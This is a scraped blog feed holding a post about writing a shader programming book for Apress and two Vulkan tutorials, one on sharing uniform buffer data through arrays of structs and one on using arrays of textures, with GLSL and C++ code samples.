<li><a href="https://filippo.io/making-system-calls-from-assembly-in-mac-os-x/">https://filippo.io/making-system-calls-from-assembly-in-mac-os-x/</a></li>
</ul>
<p>I also want to link again to <a href="https://www.hopperapp.com/">Hopper</a> and <a href="https://ridiculousfish.com/hexfiend/">Hex Fiend</a> which made my life way easier. Hopper in particular is a really impressive bit of software, and I get an excuse to use it again in the future.</p>
<p>If you want to say hi, or ask any questions about anything in the article, I’m available (sporadically) <a href="https://twitter.com/khalladay">on Twitter!</a> Thanks for reading!</p>
I Wrote A Book About Shaders!2019-04-18T00:00:00+00:00http://kylehalladay.com/blog/2019/04/18/I-Wrote-A-Book<p>From the looks of my blog archive, it’s been 13 months since I dropped off the map and stopped posting. That’s because around that time I got an e-mail from Apress Books asking if I wanted to write for them. I’ve gotten several messsages like this since I started writing my blog, but this one was different in two key ways:</p>
<ol>
<li>They didn’t have a book idea in mind already, instead, they wanted to know what I might like to write.</li>
<li>Their sales pitch was “you’re already writing about technical things, why not get paid for it?” which I found pretty convincing.</li>
</ol>
<p>So I replied to the e-mail, and pretty quickly I decided that I wanted to write a book with them, and now you can purchase that book (<a href="https://www.amazon.com/Practical-Shader-Development-Fragment-Developers/dp/1484244567">Amazon link</a>)! The schtick of it is that it’s an example based approach to learning shaders. If you’ve never written a shader before, and want to get your feet wet and learn a few things without necessarily needing to learn a ton of math or graphics api details, this is the book for you. It’s not super technical, it’s really more about having some fun and building a bunch of different things.</p>
<div align="center">
<img src="/images/post_images/2019-04-18/book_cover.JPG" />
Here's what it looks like!
<br /><br />
</div>
<p>It’s kind of surreal to be holding a physical copy of this thing. Both because it’s the first physical thing that I’ve produced in my career, and because I can’t believe this project is finally finished. So to celebrate, here’s a disorganized collection of thoughts I have about the whole experience.</p>
<h2 id="writing-a-book-is-hard-work">Writing A Book Is Hard Work</h2>
<p>When I started this project I honestly didn’t think it was going to be that much different from regularly writing blog posts. Having now done both, let me say very clearly that <strong>writing a book is nothing like writing blog posts</strong>. Not only do blog posts not have deadlines, but they can jump around, and can assume any level of ability on the part of your readers, and you can always delete or edit a blog post if you get something wrong. Writing a book is 1000% harder than writing a blog.</p>
<p>There were a lot of days that I didn’t feel like writing. Hell, there were a lot of weeks where I didn’t feel like writing. When people asked how writing was going, my standard answer was “the fun runs out after page 100,” which, depending on the day, was either just a funny default response, or painful truth. I’m completely convinced that books are mostly written out of pure stubbornness, and that the people who write books aren’t necessarily the most qualified people to write about that topic, but they are perhaps the most qualified people to write about that topic that feel like finishing a book.</p>
<h2 id="finishing-a-book-is-scary">Finishing A Book Is Scary</h2>
<p>Speaking of finishing a book, that’s a scary proposition in itself. By the time things were done, I was both relieved to be done writing and terrified at how many things I knew that I would change if I had more time to work on the project. Now I’m just hoping that there aren’t any huge and embarassing content mistakes that slipped through the cracks.</p>
<p>Just like making games, having a final deadline where you have to ship the thing is probably the only way that a lot of books ever see the light of day. Without that, by the time I felt ready to publish we’d all be rendering things with quantum computers that path trace on the blockchain, and the book wouldn’t be relevant any more. So instead, I’ve just had to come to grips with the fact that the book isn’t perfect, but it’s <strong>done</strong>, and that’s ok.</p>
<h2 id="finishing-a-book-is-pretty-great-too">Finishing A Book Is Pretty Great Too</h2>
<p>Despite all my complaining, getting the copies of my book in the mail was pretty amazing. Actually finishing the project and seeing the end result has been hugely rewarding, and I’m really glad that I stuck with things until the end. Hopefully people like the book, but even just following through on a large personal project is a great feeling.</p>
<h2 id="apress-was-pretty-great-to-work-with">Apress Was Pretty Great To Work With</h2>
<p>There are lots of horror stories floating around about working with publishers like Packt or Apress, but I have a lot of good things to say about them. The folks that I talked to day to day were professional, easy to work with, and always accommodating when I needed to move a chapter deadline because work was going crazy (I’m a stickler for schedules and deadlines, so they may have been flexible because this only happened a couple of times). They also paid me on time, which seems to be a common thing that other people complain about with technical book publishers.</p>
<p>I was a bit surprised at how little the copy editing team there corrected my grammar and sentence structure, but given how many other mistakes they caught that would have been disastrous to actually print in a book, I can’t say I’m too upset about it. It’s not like I was writing the next great Canadian novel. I also didn’t express this concern to Apress during the copy editing phase of the book, so this is also on me.</p>
<h2 id="i-dont-want-to-write-for-a-while">I Don’t Want To Write For A While</h2>
<p>I think it’s fair to say that I’m a burnt out on writing right now. Even though it’s been a few months since I’ve had to do a lot of writing for the book, I still don’t have much desire to start writing blog posts again, and I think I’m going to write a lot less this year in general. Instead, I want to spend more time learning new things and working on things that don’t necessarily translate into a good blog post. Hopefully by the time I feel like writing again, I’ll have some new, interesting things to share.</p>
<p>Hopefully some of you pick up the book and learn a thing or two! In the mean time, I’m always available to chat on <a href="https://twitter.com/khalladay">on Twitter</a>. If you want to make my day, shoot me a message if you grab a copy. Have a good one!</p>
A "Bind Once" Approach to Uniform Data2018-02-05T00:00:00+00:00http://kylehalladay.com/blog/tutorial/vulkan/2018/02/05/Bind-Once-Uniform-Data-Vulkan<p>After figuring out how to use a global <a href="http://kylehalladay.com/blog/tutorial/vulkan/2018/01/28/Textue-Arrays-Vulkan.html">array of textures</a> to store all the textures that are in use for a frame in a single descriptor set, I returned to my <a href="https://github.com/khalladay/VkMaterialSystem">material system project</a> and realized how much easier life would be if I could do all my descriptor set binding at the beginning of a frame, both because I’d avoid any performance overhead from doing lots of binding, and because it greatly simplifies anything related to descriptor set versioning (or dealing with updating buffers that are in flight).</p>
<p>As it turns out, this is totally possible and really easy to do, although I have no idea if it’s a good idea in the grand scheme of things. Also, just like using an array of textures, I couldn’t find anyone else writing about, so I guess that means it’s on me to share.</p>
<div align="center">
<img src="/images/post_images/2018-02-05/badideas.jpg" />
<br /><br />
</div>
<p>So with all that said, this post is going to show off how to use a single, globally bound descriptor set (and a single VkBuffer!) to store all the uniform data needed for multiple objects that are using different shaders.</p>
<p>I’ve set all this up in a demo project (<a href="https://github.com/khalladay/VulkanDemoProjects/tree/master/VulkanDemoProjects/UniformBufferArrays">on github</a>) if you just want the code. The fragment shaders I used in that demo are:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#version 450 core
#extension GL_ARB_separate_shader_objects : enable
</span>
<span class="k">struct</span> <span class="n">Data48</span>
<span class="p">{</span>
<span class="n">vec4</span> <span class="n">colorA</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorB</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorC</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">layout</span><span class="p">(</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">DATA_48</span>
<span class="p">{</span>
<span class="n">Data48</span> <span class="n">testing</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="p">}</span><span class="n">data</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">dataIdx</span><span class="p">;</span>
<span class="p">}</span><span class="n">pc</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="n">out</span> <span class="n">vec4</span> <span class="n">outColor</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">outColor</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">testing</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorA</span>
<span class="o">+</span> <span class="n">data</span><span class="p">.</span><span class="n">testing</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorB</span>
<span class="o">+</span> <span class="n">data</span><span class="p">.</span><span class="n">testing</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorC</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>and</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#version 450 core
#extension GL_ARB_separate_shader_objects : enable
</span>
<span class="k">struct</span> <span class="n">Data48</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">r</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorB</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">x</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">layout</span><span class="p">(</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">DATA_48</span>
<span class="p">{</span>
<span class="n">Data48</span> <span class="n">data</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="p">}</span><span class="n">data</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">dataIdx</span><span class="p">;</span>
<span class="p">}</span><span class="n">pc</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="n">out</span> <span class="n">vec4</span> <span class="n">outColor</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">red</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">r</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">intCast</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">x</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">colorA</span> <span class="o">=</span> <span class="n">vec4</span><span class="p">(</span><span class="n">red</span><span class="p">,</span> <span class="n">intCast</span><span class="p">,</span> <span class="n">intCast</span><span class="p">,</span> <span class="n">intCast</span><span class="p">);</span>
<span class="n">outColor</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">dataIdx</span><span class="p">].</span><span class="n">colorB</span> <span class="o">*</span> <span class="n">colorA</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I’ll omit the vert shader because it just passes through uv coords and does nothing fancy. The stars of our show are the ones above.</p>
<h2 id="how-this-all-works">How This All Works</h2>
<p>The trick, which you may have already guessed from the shader code, is to keep all the uniform buffer objects the same size. VkDescriptorSets, and VkBuffers don’t actually care about the contents of your uniform buffers, otherwise we’d have to provide a lot more information when setting up a descriptor set binding. All they care about is how big the buffer needs to be.</p>
<p>Knowing that, it follows that if all our shaders are using buffers of the same size, they should all be able to use the same descriptor set, and that’s exactly how things work in practice. It’s almost embarrassing how easy it is to set up the descriptor set layout to do this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkDescriptorSetLayoutBinding</span> <span class="n">layoutBinding</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">stageFlags</span> <span class="o">=</span> <span class="n">VK_SHADER_STAGE_FRAGMENT_BIT</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">pImmutableSamplers</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">VkDescriptorSetLayoutCreateInfo</span> <span class="n">layoutInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">layoutInfo</span><span class="p">.</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO</span><span class="p">;</span>
<span class="n">layoutInfo</span><span class="p">.</span><span class="n">bindingCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">layoutInfo</span><span class="p">.</span><span class="n">pBindings</span> <span class="o">=</span> <span class="o">&</span><span class="n">layoutBinding</span><span class="p">;</span>
<span class="n">vkCreateDescriptorSetLayout</span><span class="p">(...)</span></code></pre></figure>
<p>You don’t even need to worry about specifying the number of elements in the array, since it’s all stored in a uniform block. As far as the descriptor set is concerned, we’re not even using an array.</p>
<p>Once you’ve set up your Descriptor Set Layout, allocating the buffer to store the data is similarly easy. I’m going to just copy + paste the utility function call from my demo project, because allocating a buffer and memory associated with it in vulkan has a lot of boiler plate, but in reality, all you do is create a buffer large enough to hold the array you declared. So if you have an array of length 8, that stores 48 byte structures, you’re buffer needs to be 8 * 48 (384) bytes large.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">vkh</span><span class="o">::</span><span class="n">createBuffer</span><span class="p">(</span><span class="n">demoData</span><span class="p">.</span><span class="n">sharedBuffer</span><span class="p">,</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">bufferMemory</span><span class="p">,</span>
<span class="n">SHARED_UNIFORM_SIZE</span> <span class="o">*</span> <span class="n">BUFFER_ARRAY_SIZE</span><span class="p">,</span>
<span class="n">VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT</span> <span class="o">|</span> <span class="n">VK_BUFFER_USAGE_TRANSFER_DST_BIT</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT</span><span class="p">,</span>
<span class="n">appContext</span><span class="p">);</span></code></pre></figure>
<p>And finally, once you’ve put the data into that buffer writing the descriptor set is also about as straightforward as possible.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">VkDescriptorBufferInfo</span> <span class="n">bufferInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">bufferInfo</span><span class="p">.</span><span class="n">buffer</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">sharedBuffer</span><span class="p">;</span>
<span class="n">bufferInfo</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">bufferInfo</span><span class="p">.</span><span class="n">range</span> <span class="o">=</span> <span class="n">VK_WHOLE_SIZE</span><span class="p">;</span>
<span class="n">VkWriteDescriptorSet</span> <span class="n">setWrite</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">dstBinding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">dstArrayElement</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">dstSet</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">descriptorSet</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">pBufferInfo</span> <span class="o">=</span> <span class="o">&</span><span class="n">bufferInfo</span><span class="p">;</span>
<span class="n">setWrite</span><span class="p">.</span><span class="n">pImageInfo</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">vkUpdateDescriptorSets</span><span class="p">(</span><span class="n">appContext</span><span class="p">.</span><span class="n">device</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">setWrite</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">nullptr</span><span class="p">);</span></code></pre></figure>
<p>This up is completely identical to setting up a single uniform buffer object, because in practice, that’s exactly what’s going on. The only difference is that to make this work you have to keep a few more things in mind:</p>
<h2 id="ensuring-buffers-are-the-same-size">Ensuring Buffers Are The Same Size</h2>
<p>I’ve already covered that you need to keep the uniform objects the same size, but how to do that is a bit different for Vulkan than it might be if you were working with solely cpu side structs. This is because struct members in Vulkan shaders are 16 byte aligned, which means that if you’re trying to manually specify the structs in your c++ code (like I do in my example project), you need to add some additional syntax to make sure if all adds up properly:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">LayoutA</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorA</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorB</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorC</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">LayoutB</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="kt">float</span> <span class="n">r</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">colorA</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="kt">int</span> <span class="n">x</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>Unless you’re working with matrices, this actually ends up making your life easier, because any data type equal to or smaller than the size of a vec4 will fit inside 16 bytes, meaning that rather than worrying about the size of the struct members, you just worry about keeping the count the same. Once you add matrices, you have to start looking at sizes again.</p>
<p>Once the structs are set up, you just need some quick pointer math to get them into one buffer:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">char</span><span class="o">*</span> <span class="n">sharedData</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">LayoutA</span><span class="p">)</span> <span class="o">*</span> <span class="n">BUFFER_ARRAY_SIZE</span><span class="p">);</span>
<span class="n">LayoutA</span> <span class="n">first</span> <span class="o">=</span> <span class="p">{</span><span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span><span class="mf">0.5</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">0.25</span><span class="p">,</span><span class="mf">0.25</span><span class="p">,</span><span class="mi">1</span><span class="p">)};</span>
<span class="n">LayoutB</span> <span class="n">second</span> <span class="o">=</span> <span class="mf">1.0</span><span class="p">,</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="err">}</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">writeLocation</span> <span class="o">=</span> <span class="n">sharedData</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">writeLocation</span><span class="p">,</span> <span class="o">&</span><span class="n">first</span><span class="p">,</span> <span class="n">SHARED_UNIFORM_SIZE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">((</span><span class="n">writeLocation</span> <span class="o">+=</span> <span class="n">SHARED_UNIFORM_SIZE</span><span class="p">),</span> <span class="o">&</span><span class="n">second</span><span class="p">,</span> <span class="n">SHARED_UNIFORM_SIZE</span><span class="p">);</span></code></pre></figure>
<p>This works, but If you’re like me, you likely don’t want to have to recompile your c++ code every time a shader changes. In the past, I got around this by using a program I wrote for my <a href="https://github.com/khalladay/VkMaterialSystem">material system</a> (called the “ShaderPipeline”) that uses <a href="https://github.com/KhronosGroup/SPIRV-Cross">SPIR-V Cross</a> to generate json descriptions of the shaders that I use. One part of this description are the sizes and offsets of each member of a uniform buffer object, but with the array of structs approach here, SpirV-Cross ends up just telling you details about the size of the entire array:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="s">"descriptor_sets"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"set"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"binding"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"DATA_48"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">384</span><span class="p">,</span>
<span class="s">"arrayLen"</span><span class="o">:</span> <span class="mi">1</span><span class="p">,</span>
<span class="s">"type"</span><span class="o">:</span> <span class="s">"UNIFORM"</span><span class="p">,</span>
<span class="s">"members"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"data"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">384</span><span class="p">,</span>
<span class="s">"offset"</span><span class="o">:</span> <span class="mi">0</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}]</span></code></pre></figure>
<p>This isn’t super helpful, which I think means that I’m going to have to add some support for glsl comment annotations to let this tool spit out more information about the “DATA48” struct. However, my main point here is that this “array of structs” approach does not require you to recompile your c++ code to make shader changes. Once you know the offsets for each variable, you can just do some quick pointer math and write things where they need to go in a generic way.</p>
<p>Side Note: this ShaderPipeline tool is turning out to be way more useful than the material system demo. I think it’s soon going to need it’s own github repo.</p>
<h2 id="a-potential-implementation-idea">A Potential Implementation Idea</h2>
<p>I haven’t tried this out yet, so take it with a grain of salt, but it seems like this technique would make it possible to keep uniform data centralized in a few different memory pools, one for each size of uniform buffer object (ie: a pool for 48 byte buffers, a pool for 128 byte, etc). Whenever a material instance gets created, it just gets assigned a slot in the appropriate pool for it’s data. Then when it comes time to actually use the material, it just needs to know enough to pass the index (or indices in the case of multiple uniforms) via push constants to select the right data.</p>
<p>It might even be possible to use this separation of materials to figure out which thread should build the commands for drawing each object, so that each command list that gets built doesn’t necessarily even need to bind every one of these uniform arrays.</p>
<p>I think this is the approach I’m going to try first in the next non-demo project that I make with Vulkan (whatever/whenever that is), but as simple as it sounds on paper, there’s already at least one more factor that needs to be mentioned:</p>
<h2 id="handling-large-buffer-updates">Handling Large Buffer Updates</h2>
<p>This approach to uniform data runs into problems pretty quickly as you add more entries to the arrays of data. The <a href="https://www.khronos.org/registry/vulkan/specs/1.0/man/html/vkCmdUpdateBuffer.html">vulkan spec</a> states that:</p>
<blockquote>
<p>Buffer updates performed with vkCmdUpdateBuffer first copy the data into command buffer memory when the command is recorded (which requires additional storage and may incur an additional allocation), and then copy the data from the command buffer into dstBuffer when the command is executed on a device.</p>
</blockquote>
<blockquote>
<p>The additional cost of this functionality compared to buffer to buffer copies means it is only recommended for very small amounts of data, and is why it is limited to only 65536 bytes.</p>
</blockquote>
<blockquote>
<p>Applications can work around this by issuing multiple vkCmdUpdateBuffer commands to different ranges of the same buffer, but it is strongly recommended that they should not.</p>
</blockquote>
<p>So once we exceed 65536 bytes in one of our buffer pools, we need to find a different way to update the data there. With the 48 byte buffers we’re using above, we won’t hit that limit for a while, but a hypothetical 128 byte uniform buffer array would exceed the limit with only 512 entries.</p>
<p>It seems like the right way to address this is to limit the size of any vkBuffer that stores data that needs to be modified, and then just before the renderer begins assembling command lists, copy those buffers into a larger buffer that exceeds the 65536 limit. This approach will add some additional complexity to setting up material data / managing those buffer pools, but wouldn’t increase any complexity as far as our actual rendering logic is concerned… which I like.</p>
<h2 id="wrap-up">Wrap Up</h2>
<p>I’ll mention again that I haven’t actually tried this out in a real application, and it could be that there are performance costs associated with binding really large buffers, or some other performance gotcha that I’m going to run into with this approach (in fast, there’s almost certainly at least 10 things I’m not considering), but I really like this approach to working with uniform data, so I’m going to start giving it a shot in larger projects.</p>
<p>This was a really fun post to write and fun project to put together. Between my last post about texture arrays, and this one, I feel like I”m starting to get a good grip on how Vulkan handles Descriptor Sets, and how things map from GLSL to Vulkan.</p>
<p>As always, if you want to say hi, or point out something that I got wrong (or didn’t think about), send a message to @khalladay <a href="https://twitter.com/khalladay">on Twitter</a> or <a href="https://mastodon.gamedev.place/@khalladay">on Mastodon</a>. Have a good one!</p>
Using Arrays of Textures in Vulkan Shaders2018-01-28T00:00:00+00:00http://kylehalladay.com/blog/tutorial/vulkan/2018/01/28/Textue-Arrays-Vulkan<p>Lately I’ve been trying to wrap my head how to effectively deal with textures in Vulkan. I don’t want any descriptor sets that need to be bound on a per object basis, which means that just sticking each texture into it’s own set binding isn’t going to work. Instead, thanks to the <a href="http://32ipi028l5q82yhj72224m8j-wpengine.netdna-ssl.com/wp-content/uploads/2016/03/VulkanFastPaths.pdf">Vulkan Fast Paths</a> presentation from AMD, I’ve been looking into using a global array of textures that stores all my textures in a descriptor set that I can bind at the beginning of the frame.</p>
<p>The AMD presentation doesn’t actually cover how to set up an array of textures in Vulkan, and I couldn’t find a good explanation of how to do that anywhere online, so now that I’ve figured it out I want to post a quick tutorial on here about it for the next person who gets stuck. I’ll go more in depth about how this array fits into my material system in a later post, but for now I just want to cover the nuts and bolts of setting up a shader to use an array of texture.</p>
<p>One more thing to note before I get started: If you’re looking for a way to work with images of the same size, Sascha Willems has a great example of using a sampler2DArray in his <a href="https://github.com/SaschaWillems/Vulkan">Vulkan Examples Project</a>. The advantage of using an array of textures instead of something like a sampler2DArray is that the array of textures approach supports storing multiple image sizes in the same array by default. I don’t know how much (if any) of a performance penalty you pay for using an array of textures over a sampler2DArray.</p>
<p>With all that said, the goal of this post is going to be to walk through how to set up a Vulkan app so that you can use a shader like this one:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#version 450 core
#extension GL_ARB_separate_shader_objects : enable
</span>
<span class="n">layout</span><span class="p">(</span><span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">sampler</span> <span class="n">samp</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">binding</span> <span class="o">=</span> <span class="mi">1</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">texture2D</span> <span class="n">textures</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">imgIdx</span><span class="p">;</span>
<span class="p">}</span><span class="n">pc</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">out</span> <span class="n">vec4</span> <span class="n">outColor</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">in</span> <span class="n">vec2</span> <span class="n">fragUV</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">outColor</span> <span class="o">=</span> <span class="n">texture</span><span class="p">(</span><span class="n">sampler2D</span><span class="p">(</span><span class="n">textures</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">imgIdx</span><span class="p">],</span> <span class="n">samp</span><span class="p">),</span> <span class="n">fragUV</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>I’ve put all the code for this up in an <a href="https://github.com/khalladay/VulkanDemoProjects/tree/master/VulkanDemoProjects/TextureArrays">example project</a> on github, which renders a full screen quad with the above shader, and changes what image is displayed by updated the imgIdx variable in the push constant, so feel free to grab that and take a look. I’m going to deep dive into parts of that code for the remainder of this post.</p>
<h2 id="setting-up-the-descriptor-set-layout">Setting Up The Descriptor Set Layout</h2>
